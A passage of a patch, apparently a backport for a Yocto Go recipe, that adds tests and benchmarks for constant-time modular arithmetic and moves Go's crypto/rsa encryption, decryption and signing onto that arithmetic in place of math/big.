885+func TestFromBig(t *testing.T) {
886+ expected := []byte{0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}
887+ theBig := new(big.Int).SetBytes(expected)
888+ actual := natFromBig(theBig).fillBytes(make([]byte, len(expected)))
889+ if !bytes.Equal(actual, expected) {
890+ t.Errorf("%+x != %+x", actual, expected)
891+ }
892+}
893+
894+func TestFillBytes(t *testing.T) {
895+ xBytes := []byte{0xAA, 0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
896+ x := natFromBytes(xBytes)
897+ for l := 20; l >= len(xBytes); l-- {
898+ buf := make([]byte, l)
899+ rand.Read(buf)
900+ actual := x.fillBytes(buf)
901+ expected := make([]byte, l)
902+ copy(expected[l-len(xBytes):], xBytes)
903+ if !bytes.Equal(actual, expected) {
904+ t.Errorf("%d: %+v != %+v", l, actual, expected)
905+ }
906+ }
907+ for l := len(xBytes) - 1; l >= 0; l-- {
908+ (func() {
909+ defer func() {
910+ if recover() == nil {
911+ t.Errorf("%d: expected panic", l)
912+ }
913+ }()
914+ x.fillBytes(make([]byte, l))
915+ })()
916+ }
917+}
918+
919+func TestFromBytes(t *testing.T) {
920+ f := func(xBytes []byte) bool {
921+ if len(xBytes) == 0 {
922+ return true
923+ }
924+ actual := natFromBytes(xBytes).fillBytes(make([]byte, len(xBytes)))
925+ if !bytes.Equal(actual, xBytes) {
926+ t.Errorf("%+x != %+x", actual, xBytes)
927+ return false
928+ }
929+ return true
930+ }
931+
932+ err := quick.Check(f, &quick.Config{})
933+ if err != nil {
934+ t.Error(err)
935+ }
936+
937+ f([]byte{0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88})
938+ f(bytes.Repeat([]byte{0xFF}, _W))
939+}
940+
941+func TestShiftIn(t *testing.T) {
942+ if bits.UintSize != 64 {
943+ t.Skip("examples are only valid in 64 bit")
944+ }
945+ examples := []struct {
946+ m, x, expected []byte
947+ y uint64
948+ }{{
949+ m: []byte{13},
950+ x: []byte{0},
951+ y: 0x7FFF_FFFF_FFFF_FFFF,
952+ expected: []byte{7},
953+ }, {
954+ m: []byte{13},
955+ x: []byte{7},
956+ y: 0x7FFF_FFFF_FFFF_FFFF,
957+ expected: []byte{11},
958+ }, {
959+ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
960+ x: make([]byte, 9),
961+ y: 0x7FFF_FFFF_FFFF_FFFF,
962+ expected: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
963+ }, {
964+ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
965+ x: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
966+ y: 0,
967+ expected: []byte{0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08},
968+ }}
969+
970+ for i, tt := range examples {
971+ m := modulusFromNat(natFromBytes(tt.m))
972+ got := natFromBytes(tt.x).expandFor(m).shiftIn(uint(tt.y), m)
973+ if got.cmpEq(natFromBytes(tt.expected).expandFor(m)) != 1 {
974+ t.Errorf("%d: got %x, expected %x", i, got, tt.expected)
975+ }
976+ }
977+}
978+
979+func TestModulusAndNatSizes(t *testing.T) {
980+ // These are 126 bit (2 * _W on 64-bit architectures) values, serialized as
981+ // 128 bits worth of bytes. If leading zeroes are stripped, they fit in two
982+ // limbs, if they are not, they fit in three. This can be a problem because
983+ // modulus strips leading zeroes and nat does not.
984+ m := modulusFromNat(natFromBytes([]byte{
985+ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
986+ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}))
987+ x := natFromBytes([]byte{
988+ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
989+ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe})
990+ x.expandFor(m) // must not panic for shrinking
991+}
992+
993+func TestExpand(t *testing.T) {
994+ sliced := []uint{1, 2, 3, 4}
995+ examples := []struct {
996+ in []uint
997+ n int
998+ out []uint
999+ }{{
1000+ []uint{1, 2},
1001+ 4,
1002+ []uint{1, 2, 0, 0},
1003+ }, {
1004+ sliced[:2],
1005+ 4,
1006+ []uint{1, 2, 0, 0},
1007+ }, {
1008+ []uint{1, 2},
1009+ 2,
1010+ []uint{1, 2},
1011+ }, {
1012+ []uint{1, 2, 0},
1013+ 2,
1014+ []uint{1, 2},
1015+ }}
1016+
1017+ for i, tt := range examples {
1018+ got := (&nat{tt.in}).expand(tt.n)
1019+ if len(got.limbs) != len(tt.out) || got.cmpEq(&nat{tt.out}) != 1 {
1020+ t.Errorf("%d: got %x, expected %x", i, got, tt.out)
1021+ }
1022+ }
1023+}
1024+
1025+func TestMod(t *testing.T) {
1026+ m := modulusFromNat(natFromBytes([]byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d}))
1027+ x := natFromBytes([]byte{0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01})
1028+ out := new(nat)
1029+ out.mod(x, m)
1030+ expected := natFromBytes([]byte{0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09})
1031+ if out.cmpEq(expected) != 1 {
1032+ t.Errorf("%+v != %+v", out, expected)
1033+ }
1034+}
1035+
1036+func TestModSub(t *testing.T) {
1037+ m := modulusFromNat(&nat{[]uint{13}})
1038+ x := &nat{[]uint{6}}
1039+ y := &nat{[]uint{7}}
1040+ x.modSub(y, m)
1041+ expected := &nat{[]uint{12}}
1042+ if x.cmpEq(expected) != 1 {
1043+ t.Errorf("%+v != %+v", x, expected)
1044+ }
1045+ x.modSub(y, m)
1046+ expected = &nat{[]uint{5}}
1047+ if x.cmpEq(expected) != 1 {
1048+ t.Errorf("%+v != %+v", x, expected)
1049+ }
1050+}
1051+
1052+func TestModAdd(t *testing.T) {
1053+ m := modulusFromNat(&nat{[]uint{13}})
1054+ x := &nat{[]uint{6}}
1055+ y := &nat{[]uint{7}}
1056+ x.modAdd(y, m)
1057+ expected := &nat{[]uint{0}}
1058+ if x.cmpEq(expected) != 1 {
1059+ t.Errorf("%+v != %+v", x, expected)
1060+ }
1061+ x.modAdd(y, m)
1062+ expected = &nat{[]uint{7}}
1063+ if x.cmpEq(expected) != 1 {
1064+ t.Errorf("%+v != %+v", x, expected)
1065+ }
1066+}
1067+
1068+func TestExp(t *testing.T) {
1069+ m := modulusFromNat(&nat{[]uint{13}})
1070+ x := &nat{[]uint{3}}
1071+ out := &nat{[]uint{0}}
1072+ out.exp(x, []byte{12}, m)
1073+ expected := &nat{[]uint{1}}
1074+ if out.cmpEq(expected) != 1 {
1075+ t.Errorf("%+v != %+v", out, expected)
1076+ }
1077+}
1078+
1079+func makeBenchmarkModulus() *modulus {
1080+ m := make([]uint, 32)
1081+ for i := 0; i < 32; i++ {
1082+ m[i] = _MASK
1083+ }
1084+ return modulusFromNat(&nat{limbs: m})
1085+}
1086+
1087+func makeBenchmarkValue() *nat {
1088+ x := make([]uint, 32)
1089+ for i := 0; i < 32; i++ {
1090+ x[i] = _MASK - 1
1091+ }
1092+ return &nat{limbs: x}
1093+}
1094+
1095+func makeBenchmarkExponent() []byte {
1096+ e := make([]byte, 256)
1097+ for i := 0; i < 32; i++ {
1098+ e[i] = 0xFF
1099+ }
1100+ return e
1101+}
1102+
1103+func BenchmarkModAdd(b *testing.B) {
1104+ x := makeBenchmarkValue()
1105+ y := makeBenchmarkValue()
1106+ m := makeBenchmarkModulus()
1107+
1108+ b.ResetTimer()
1109+ for i := 0; i < b.N; i++ {
1110+ x.modAdd(y, m)
1111+ }
1112+}
1113+
1114+func BenchmarkModSub(b *testing.B) {
1115+ x := makeBenchmarkValue()
1116+ y := makeBenchmarkValue()
1117+ m := makeBenchmarkModulus()
1118+
1119+ b.ResetTimer()
1120+ for i := 0; i < b.N; i++ {
1121+ x.modSub(y, m)
1122+ }
1123+}
1124+
1125+func BenchmarkMontgomeryRepr(b *testing.B) {
1126+ x := makeBenchmarkValue()
1127+ m := makeBenchmarkModulus()
1128+
1129+ b.ResetTimer()
1130+ for i := 0; i < b.N; i++ {
1131+ x.montgomeryRepresentation(m)
1132+ }
1133+}
1134+
1135+func BenchmarkMontgomeryMul(b *testing.B) {
1136+ x := makeBenchmarkValue()
1137+ y := makeBenchmarkValue()
1138+ out := makeBenchmarkValue()
1139+ m := makeBenchmarkModulus()
1140+
1141+ b.ResetTimer()
1142+ for i := 0; i < b.N; i++ {
1143+ out.montgomeryMul(x, y, m)
1144+ }
1145+}
1146+
1147+func BenchmarkModMul(b *testing.B) {
1148+ x := makeBenchmarkValue()
1149+ y := makeBenchmarkValue()
1150+ m := makeBenchmarkModulus()
1151+
1152+ b.ResetTimer()
1153+ for i := 0; i < b.N; i++ {
1154+ x.modMul(y, m)
1155+ }
1156+}
1157+
1158+func BenchmarkExpBig(b *testing.B) {
1159+ out := new(big.Int)
1160+ exponentBytes := makeBenchmarkExponent()
1161+ x := new(big.Int).SetBytes(exponentBytes)
1162+ e := new(big.Int).SetBytes(exponentBytes)
1163+ n := new(big.Int).SetBytes(exponentBytes)
1164+ one := new(big.Int).SetUint64(1)
1165+ n.Add(n, one)
1166+
1167+ b.ResetTimer()
1168+ for i := 0; i < b.N; i++ {
1169+ out.Exp(x, e, n)
1170+ }
1171+}
1172+
1173+func BenchmarkExp(b *testing.B) {
1174+ x := makeBenchmarkValue()
1175+ e := makeBenchmarkExponent()
1176+ out := makeBenchmarkValue()
1177+ m := makeBenchmarkModulus()
1178+
1179+ b.ResetTimer()
1180+ for i := 0; i < b.N; i++ {
1181+ out.exp(x, e, m)
1182+ }
1183+}
1184diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
1185index a216be3..ce89f92 100644
1186--- a/src/crypto/rsa/pkcs1v15.go
1187+++ b/src/crypto/rsa/pkcs1v15.go
1188@@ -9,7 +9,6 @@ import (
1189 "crypto/subtle"
1190 "errors"
1191 "io"
1192- "math/big"
1193
1194 "crypto/internal/randutil"
1195 )
1196@@ -58,14 +57,11 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
1197 em[len(em)-len(msg)-1] = 0
1198 copy(mm, msg)
1199
1200- m := new(big.Int).SetBytes(em)
1201- c := encrypt(new(big.Int), pub, m)
1202-
1203- return c.FillBytes(em), nil
1204+ return encrypt(pub, em), nil
1205 }
1206
1207 // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
1208-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
1209+// The rand parameter is legacy and ignored, and it can be as nil.
1210 //
1211 // Note that whether this function returns an error or not discloses secret
1212 // information. If an attacker can cause this function to run repeatedly and
1213@@ -76,7 +72,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
1214 if err := checkPub(&priv.PublicKey); err != nil {
1215 return nil, err
1216 }
1217- valid, out, index, err := decryptPKCS1v15(rand, priv, ciphertext)
1218+ valid, out, index, err := decryptPKCS1v15(priv, ciphertext)
1219 if err != nil {
1220 return nil, err
1221 }
1222@@ -87,7 +83,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
1223 }
1224
1225 // DecryptPKCS1v15SessionKey decrypts a session key using RSA and the padding scheme from PKCS#1 v1.5.
1226-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
1227+// The rand parameter is legacy and ignored, and it can be as nil.
1228 // It returns an error if the ciphertext is the wrong length or if the
1229 // ciphertext is greater than the public modulus. Otherwise, no error is
1230 // returned. If the padding is valid, the resulting plaintext message is copied
1231@@ -114,7 +110,7 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
1232 return ErrDecryption
1233 }
1234
1235- valid, em, index, err := decryptPKCS1v15(rand, priv, ciphertext)
1236+ valid, em, index, err := decryptPKCS1v15(priv, ciphertext)
1237 if err != nil {
1238 return err
1239 }
1240@@ -130,26 +126,24 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
1241 return nil
1242 }
1243
1244-// decryptPKCS1v15 decrypts ciphertext using priv and blinds the operation if
1245-// rand is not nil. It returns one or zero in valid that indicates whether the
1246-// plaintext was correctly structured. In either case, the plaintext is
1247-// returned in em so that it may be read independently of whether it was valid
1248-// in order to maintain constant memory access patterns. If the plaintext was
1249-// valid then index contains the index of the original message in em.
1250-func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
1251+// decryptPKCS1v15 decrypts ciphertext using priv. It returns one or zero in
1252+// valid that indicates whether the plaintext was correctly structured.
1253+// In either case, the plaintext is returned in em so that it may be read
1254+// independently of whether it was valid in order to maintain constant memory
1255+// access patterns. If the plaintext was valid then index contains the index of
1256+// the original message in em, to allow constant time padding removal.
1257+func decryptPKCS1v15(priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
1258 k := priv.Size()
1259 if k < 11 {
1260 err = ErrDecryption
1261 return
1262 }
1263
1264- c := new(big.Int).SetBytes(ciphertext)
1265- m, err := decrypt(rand, priv, c)
1266+ em, err = decrypt(priv, ciphertext)
1267 if err != nil {
1268 return
1269 }
1270
1271- em = m.FillBytes(make([]byte, k))
1272 firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
1273 secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
1274
1275@@ -221,8 +215,7 @@ var hashPrefixes = map[crypto.Hash][]byte{
1276 // function. If hash is zero, hashed is signed directly. This isn't
1277 // advisable except for interoperability.
1278 //
1279-// If rand is not nil then RSA blinding will be used to avoid timing
1280-// side-channel attacks.
1281+// The rand parameter is legacy and ignored, and it can be as nil.
1282 //
1283 // This function is deterministic. Thus, if the set of possible
1284 // messages is small, an attacker may be able to build a map from
1285@@ -249,13 +242,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
1286 copy(em[k-tLen:k-hashLen], prefix)
1287 copy(em[k-hashLen:k], hashed)
1288
1289- m := new(big.Int).SetBytes(em)
1290- c, err := decryptAndCheck(rand, priv, m)
1291- if err != nil {
1292- return nil, err
1293- }
1294-
1295- return c.FillBytes(em), nil
1296+ return decryptAndCheck(priv, em)
1297 }
1298
1299 // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
1300@@ -275,9 +262,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
1301 return ErrVerification
1302 }
1303
1304- c := new(big.Int).SetBytes(sig)
1305- m := encrypt(new(big.Int), pub, c)
1306- em := m.FillBytes(make([]byte, k))
1307+ em := encrypt(pub, sig)
1308 // EM = 0x00 || 0x01 || PS || 0x00 || T
1309
1310 ok := subtle.ConstantTimeByteEq(em[0], 0)
1311diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
1312index 814522d..eaba4be 100644
1313--- a/src/crypto/rsa/pss.go
1314+++ b/src/crypto/rsa/pss.go
1315@@ -12,7 +12,6 @@ import (
1316 "errors"
1317 "hash"
1318 "io"
1319- "math/big"
1320 )
1321
1322 // Per RFC 8017, Section 9.1
1323@@ -207,19 +206,27 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
1324 // Note that hashed must be the result of hashing the input message using the
1325 // given hash function. salt is a random sequence of bytes whose length will be
1326 // later used to verify the signature.
1327-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
1328- emBits := priv.N.BitLen() - 1
1329+func signPSSWithSalt(priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
1330+ emBits := bigBitLen(priv.N) - 1
1331 em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
1332 if err != nil {
1333 return nil, err
1334 }
1335- m := new(big.Int).SetBytes(em)
1336- c, err := decryptAndCheck(rand, priv, m)
1337- if err != nil {
1338- return nil, err
1339+
1340+ // RFC 8017: "Note that the octet length of EM will be one less than k if
1341+ // modBits - 1 is divisible by 8 and equal to k otherwise, where k is the
1342+ // length in octets of the RSA modulus n."
1343+ //
1344+ // This is extremely annoying, as all other encrypt and decrypt inputs are
1345+ // always the exact same size as the modulus. Since it only happens for
1346+ // weird modulus sizes, fix it by padding inefficiently.
1347+ if emLen, k := len(em), priv.Size(); emLen < k {
1348+ emNew := make([]byte, k)
1349+ copy(emNew[k-emLen:], em)
1350+ em = emNew
1351 }
1352- s := make([]byte, priv.Size())
1353- return c.FillBytes(s), nil
1354+
1355+ return decryptAndCheck(priv, em)
1356 }
1357
1358 const (
1359@@ -269,7 +276,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
1360 saltLength := opts.saltLength()
1361 switch saltLength {
1362 case PSSSaltLengthAuto:
1363- saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
1364+ saltLength = (bigBitLen(priv.N)-1+7)/8 - 2 - hash.Size()
1365 case PSSSaltLengthEqualsHash:
1366 saltLength = hash.Size()
1367 }
1368@@ -278,7 +285,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
1369 if _, err := io.ReadFull(rand, salt); err != nil {
1370 return nil, err
1371 }
1372- return signPSSWithSalt(rand, priv, hash, digest, salt)
1373+ return signPSSWithSalt(priv, hash, digest, salt)
1374 }
1375
1376 // VerifyPSS verifies a PSS signature.
1377@@ -291,13 +298,22 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
1378 if len(sig) != pub.Size() {
1379 return ErrVerification
1380 }
1381- s := new(big.Int).SetBytes(sig)
1382- m := encrypt(new(big.Int), pub, s)
1383- emBits := pub.N.BitLen() - 1
1384+
1385+ emBits := bigBitLen(pub.N) - 1
1386 emLen := (emBits + 7) / 8
1387- if m.BitLen() > emLen*8 {
1388- return ErrVerification
1389+ em := encrypt(pub, sig)
1390+
1391+ // Like in signPSSWithSalt, deal with mismatches between emLen and the size
1392+ // of the modulus. The spec would have us wire emLen into the encoding
1393+ // function, but we'd rather always encode to the size of the modulus and
1394+ // then strip leading zeroes if necessary. This only happens for weird
1395+ // modulus sizes anyway.
1396+ for len(em) > emLen && len(em) > 0 {
1397+ if em[0] != 0 {
1398+ return ErrVerification
1399+ }
1400+ em = em[1:]
1401 }
1402- em := m.FillBytes(make([]byte, emLen))
1403+
1404 return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
1405 }
1406diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
1407index c3a6d46..d018b43 100644
1408--- a/src/crypto/rsa/pss_test.go
1409+++ b/src/crypto/rsa/pss_test.go
1410@@ -233,7 +233,10 @@ func TestPSSSigning(t *testing.T) {
1411 }
1412 }
1413
1414-func TestSignWithPSSSaltLengthAuto(t *testing.T) {
1415+func TestPSS513(t *testing.T) {
1416+ // See Issue 42741, and separately, RFC 8017: "Note that the octet length of
1417+ // EM will be one less than k if modBits - 1 is divisible by 8 and equal to
1418+ // k otherwise, where k is the length in octets of the RSA modulus n."
1419 key, err := GenerateKey(rand.Reader, 513)
1420 if err != nil {
1421 t.Fatal(err)
1422@@ -246,8 +249,9 @@ func TestSignWithPSSSaltLengthAuto(t *testing.T) {
1423 if err != nil {
1424 t.Fatal(err)
1425 }
1426- if len(signature) == 0 {
1427- t.Fatal("empty signature returned")
1428+ err = VerifyPSS(&key.PublicKey, crypto.SHA256, digest[:], signature, nil)
1429+ if err != nil {
1430+ t.Error(err)
1431 }
1432 }
1433
1434diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
1435index 5a00ed2..29d9d31 100644
1436--- a/src/crypto/rsa/rsa.go
1437+++ b/src/crypto/rsa/rsa.go
1438@@ -19,13 +19,17 @@
1439 // over the public key primitive, the PrivateKey type implements the
1440 // Decrypter and Signer interfaces from the crypto package.
1441 //
1442-// The RSA operations in this package are not implemented using constant-time algorithms.
1443+// Operations in this package are implemented using constant-time algorithms,
1444+// except for [GenerateKey], [PrivateKey.Precompute], and [PrivateKey.Validate].
1445+// Every other operation only leaks the bit size of the involved values, which
1446+// all depend on the selected key size.
1447 package rsa
1448
1449 import (
1450 "crypto"
1451 "crypto/rand"
1452 "crypto/subtle"
1453+ "encoding/binary"
1454 "errors"
1455 "hash"
1456 "io"
1457@@ -35,7 +39,6 @@ import (
1458 "crypto/internal/randutil"
1459 )
1460
1461-var bigZero = big.NewInt(0)
1462 var bigOne = big.NewInt(1)
1463
1464 // A PublicKey represents the public part of an RSA key.
1465@@ -47,7 +50,7 @@ type PublicKey struct {
1466 // Size returns the modulus size in bytes. Raw signatures and ciphertexts
1467 // for or by this public key will have the same size.
1468 func (pub *PublicKey) Size() int {
1469- return (pub.N.BitLen() + 7) / 8
1470+ return (bigBitLen(pub.N) + 7) / 8
1471 }
1472
1473 // OAEPOptions is an interface for passing options to OAEP decryption using the
1474@@ -351,10 +354,19 @@ func mgf1XOR(out []byte, hash hash.Hash, seed []byte) {
1475 // too large for the size of the public key.
1476 var ErrMessageTooLong = errors.New("crypto/rsa: message too long for RSA public key size")
1477
1478-func encrypt(c *big.Int, pub *PublicKey, m *big.Int) *big.Int {
1479- e := big.NewInt(int64(pub.E))
1480- c.Exp(m, e, pub.N)
1481- return c
1482+func encrypt(pub *PublicKey, plaintext []byte) []byte {
1483+
1484+ N := modulusFromNat(natFromBig(pub.N))
1485+ m := natFromBytes(plaintext).expandFor(N)
1486+
1487+ e := make([]byte, 8)
1488+ binary.BigEndian.PutUint64(e, uint64(pub.E))
1489+ for len(e) > 1 && e[0] == 0 {
1490+ e = e[1:]
1491+ }
1492+
1493+ out := make([]byte, modulusSize(N))
1494+ return new(nat).exp(m, e, N).fillBytes(out)
1495 }
1496
1497 // EncryptOAEP encrypts the given message with RSA-OAEP.
1498@@ -404,12 +416,7 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
1499 mgf1XOR(db, hash, seed)
1500 mgf1XOR(seed, hash, db)
1501
1502- m := new(big.Int)
1503- m.SetBytes(em)
1504- c := encrypt(new(big.Int), pub, m)
1505-
1506- out := make([]byte, k)
1507- return c.FillBytes(out), nil
1508+ return encrypt(pub, em), nil
1509 }
1510
1511 // ErrDecryption represents a failure to decrypt a message.
1512@@ -451,98 +458,71 @@ func (priv *PrivateKey) Precompute() {
1513 }
1514 }
1515
1516-// decrypt performs an RSA decryption, resulting in a plaintext integer. If a
1517-// random source is given, RSA blinding is used.
1518-func decrypt(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
1519- // TODO(agl): can we get away with reusing blinds?
1520- if c.Cmp(priv.N) > 0 {
1521- err = ErrDecryption
1522- return
1523+// decrypt performs an RSA decryption of ciphertext into out.
1524+func decrypt(priv *PrivateKey, ciphertext []byte) ([]byte, error) {
1525+
1526+ N := modulusFromNat(natFromBig(priv.N))
1527+ c := natFromBytes(ciphertext).expandFor(N)
1528+ if c.cmpGeq(N.nat) == 1 {
1529+ return nil, ErrDecryption
1530 }
1531 if priv.N.Sign() == 0 {
1532 return nil, ErrDecryption
1533 }
1534
1535- var ir *big.Int
1536- if random != nil {
1537- randutil.MaybeReadByte(random)
1538-
1539- // Blinding enabled. Blinding involves multiplying c by r^e.
1540- // Then the decryption operation performs (m^e * r^e)^d mod n
1541- // which equals mr mod n. The factor of r can then be removed
1542- // by multiplying by the multiplicative inverse of r.
1543-
1544- var r *big.Int
1545- ir = new(big.Int)
1546- for {
1547- r, err = rand.Int(random, priv.N)
1548- if err != nil {
1549- return
1550- }
1551- if r.Cmp(bigZero) == 0 {
1552- r = bigOne
1553- }
1554- ok := ir.ModInverse(r, priv.N)
1555- if ok != nil {
1556- break
1557- }
1558- }
1559- bigE := big.NewInt(int64(priv.E))
1560- rpowe := new(big.Int).Exp(r, bigE, priv.N) // N != 0
1561- cCopy := new(big.Int).Set(c)
1562- cCopy.Mul(cCopy, rpowe)
1563- cCopy.Mod(cCopy, priv.N)
1564- c = cCopy
1565- }
1566-
1567+ // Note that because our private decryption exponents are stored as big.Int,
1568+ // we potentially leak the exact number of bits of these exponents. This
1569+ // isn't great, but should be fine.
1570 if priv.Precomputed.Dp == nil {
1571- m = new(big.Int).Exp(c, priv.D, priv.N)
1572- } else {
1573- // We have the precalculated values needed for the CRT.
1574- m = new(big.Int).Exp(c, priv.Precomputed.Dp, priv.Primes[0])
1575- m2 := new(big.Int).Exp(c, priv.Precomputed.Dq, priv.Primes[1])
1576- m.Sub(m, m2)
1577- if m.Sign() < 0 {
1578- m.Add(m, priv.Primes[0])
1579- }
1580- m.Mul(m, priv.Precomputed.Qinv)
1581- m.Mod(m, priv.Primes[0])
1582- m.Mul(m, priv.Primes[1])
1583- m.Add(m, m2)
1584-
1585- for i, values := range priv.Precomputed.CRTValues {
1586- prime := priv.Primes[2+i]
1587- m2.Exp(c, values.Exp, prime)
1588- m2.Sub(m2, m)
1589- m2.Mul(m2, values.Coeff)
1590- m2.Mod(m2, prime)
1591- if m2.Sign() < 0 {
1592- m2.Add(m2, prime)
1593- }
1594- m2.Mul(m2, values.R)
1595- m.Add(m, m2)
1596- }
1597- }
1598-
1599- if ir != nil {
1600- // Unblind.
1601- m.Mul(m, ir)
1602- m.Mod(m, priv.N)
1603- }
1604-
1605- return
1606+ out := make([]byte, modulusSize(N))
1607+ return new(nat).exp(c, priv.D.Bytes(), N).fillBytes(out), nil
1608+ }
1609+
1610+ t0 := new(nat)
1611+ P := modulusFromNat(natFromBig(priv.Primes[0]))
1612+ Q := modulusFromNat(natFromBig(priv.Primes[1]))
1613+ // m = c ^ Dp mod p
1614+ m := new(nat).exp(t0.mod(c, P), priv.Precomputed.Dp.Bytes(), P)
1615+ // m2 = c ^ Dq mod q
1616+ m2 := new(nat).exp(t0.mod(c, Q), priv.Precomputed.Dq.Bytes(), Q)
1617+ // m = m - m2 mod p
1618+ m.modSub(t0.mod(m2, P), P)
1619+ // m = m * Qinv mod p
1620+ m.modMul(natFromBig(priv.Precomputed.Qinv).expandFor(P), P)
1621+ // m = m * q mod N
1622+ m.expandFor(N).modMul(t0.mod(Q.nat, N), N)
1623+ // m = m + m2 mod N
1624+ m.modAdd(m2.expandFor(N), N)
1625+
1626+ for i, values := range priv.Precomputed.CRTValues {
1627+ p := modulusFromNat(natFromBig(priv.Primes[2+i]))
1628+ // m2 = c ^ Exp mod p
1629+ m2.exp(t0.mod(c, p), values.Exp.Bytes(), p)
1630+ // m2 = m2 - m mod p
1631+ m2.modSub(t0.mod(m, p), p)
1632+ // m2 = m2 * Coeff mod p
1633+ m2.modMul(natFromBig(values.Coeff).expandFor(p), p)
1634+ // m2 = m2 * R mod N
1635+ R := natFromBig(values.R).expandFor(N)
1636+ m2.expandFor(N).modMul(R, N)
1637+ // m = m + m2 mod N
1638+ m.modAdd(m2, N)
1639+ }
1640+
1641+ out := make([]byte, modulusSize(N))
1642+ return m.fillBytes(out), nil
1643 }
1644
1645-func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
1646- m, err = decrypt(random, priv, c)
1647+func decryptAndCheck(priv *PrivateKey, ciphertext []byte) (m []byte, err error) {
1648+ m, err = decrypt(priv, ciphertext)
1649 if err != nil {
1650 return nil, err
1651 }
1652
1653 // In order to defend against errors in the CRT computation, m^e is
1654 // calculated, which should match the original ciphertext.
1655- check := encrypt(new(big.Int), &priv.PublicKey, m)
1656- if c.Cmp(check) != 0 {
1657+ check := encrypt(&priv.PublicKey, m)
1658+ if subtle.ConstantTimeCompare(ciphertext, check) != 1 {
1659 return nil, errors.New("rsa: internal error")
1660 }
1661 return m, nil
1662@@ -554,9 +534,7 @@ func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int
1663 // Encryption and decryption of a given message must use the same hash function
1664 // and sha256.New() is a reasonable choice.
1665 //
1666-// The random parameter, if not nil, is used to blind the private-key operation
1667-// and avoid timing side-channel attacks. Blinding is purely internal to this
1668-// function – the random data need not match that used when encrypting.
1669+// The random parameter is legacy and ignored, and it can be as nil.
1670 //
1671 // The label parameter must match the value given when encrypting. See
1672 // EncryptOAEP for details.
1673@@ -570,9 +548,7 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
1674 return nil, ErrDecryption
1675 }
1676
1677- c := new(big.Int).SetBytes(ciphertext)
1678-
1679- m, err := decrypt(random, priv, c)
1680+ em, err := decrypt(priv, ciphertext)
1681 if err != nil {
1682 return nil, err
1683 }
1684@@ -581,10 +557,6 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
1685 lHash := hash.Sum(nil)
1686 hash.Reset()
1687
1688- // We probably leak the number of leading zeros.
1689- // It's not clear that we can do anything about this.
1690- em := m.FillBytes(make([]byte, k))
1691-
1692 firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
1693
1694 seed := em[1 : hash.Size()+1]
1695--
16962.25.1
1697
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
new file mode 100644
